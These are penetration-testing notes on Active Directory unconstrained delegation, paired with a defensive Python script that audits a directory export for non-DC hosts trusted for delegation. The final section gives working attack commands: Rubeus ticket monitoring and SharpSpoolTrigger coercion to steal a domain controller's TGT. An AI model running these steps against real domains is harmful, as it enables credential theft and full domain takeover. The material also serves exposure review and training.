
Unconstrained Delegation

Identify

Linux - remote

nxc ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation

Windows - local

ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

Domain Controllers are always permitted for unconstrained delegation.
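
For an exposure review, the same bit test can be run offline over a directory export, dropping domain controllers because they always carry the flag. This is an added example, not part of the original notes or of any tool named here; it assumes a simple, unfolded LDIF export, and every host name and value in the sample is constructed.

```python
ACCOUNTDISABLE = 0x0002
SERVER_TRUST_ACCOUNT = 0x2000      # set on domain controller accounts
TRUSTED_FOR_DELEGATION = 0x80000   # 524288, the bit the LDAP filter tests

# Constructed sample export (hypothetical hosts), not data from a real domain.
SAMPLE_LDIF = """\
dn: CN=DC01,OU=Domain Controllers,DC=lab,DC=local
sAMAccountName: DC01$
userAccountControl: 532480

dn: CN=APP01,CN=Computers,DC=lab,DC=local
sAMAccountName: APP01$
userAccountControl: 528384

dn: CN=FILE01,CN=Computers,DC=lab,DC=local
sAMAccountName: FILE01$
userAccountControl: 4096

dn: CN=OLD01,CN=Computers,DC=lab,DC=local
sAMAccountName: OLD01$
userAccountControl: 528386
"""

def parse_ldif(text):
    """Split a simple, unfolded LDIF export into one dict per entry."""
    entries = []
    for block in text.strip().split("\n\n"):
        pairs = (line.partition(": ") for line in block.splitlines())
        entries.append({k.lower(): v for k, sep, v in pairs if sep})
    return entries

def audit(entries):
    """Return (account, enabled) for non-DC accounts trusted for delegation."""
    findings = []
    for entry in entries:
        try:
            uac = int(entry["useraccountcontrol"])
        except (KeyError, ValueError):
            continue
        if not (uac & TRUSTED_FOR_DELEGATION):  # same test as the bitwise-AND rule
            continue
        if uac & SERVER_TRUST_ACCOUNT:
            continue  # DCs always carry the flag; expected, not a finding
        findings.append((entry.get("samaccountname", "?"), not (uac & ACCOUNTDISABLE)))
    return sorted(findings)

if __name__ == "__main__":
    for account, enabled in audit(parse_ldif(SAMPLE_LDIF)):
        print(account, "enabled" if enabled else "disabled")
```

Each account it reports is a non-DC host holding the delegation flag, which is the list to review for removal of that setting.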

Exploit

Force DC to auth to our box and steal TGT

Monitor for tickets with Rubeus

Rubeus.exe monitor /interval:10 /nowrap

see: Authentication Coercion

OR: Run https://github.com/cube0x0/SharpSystemTriggers to coerce authentication

SharpSpoolTrigger.exe dc01.lab.local web.dev.lav.local
Where:
- DC01 is the "target".
- WEB is the "listener".

Rubeus should capture a ticket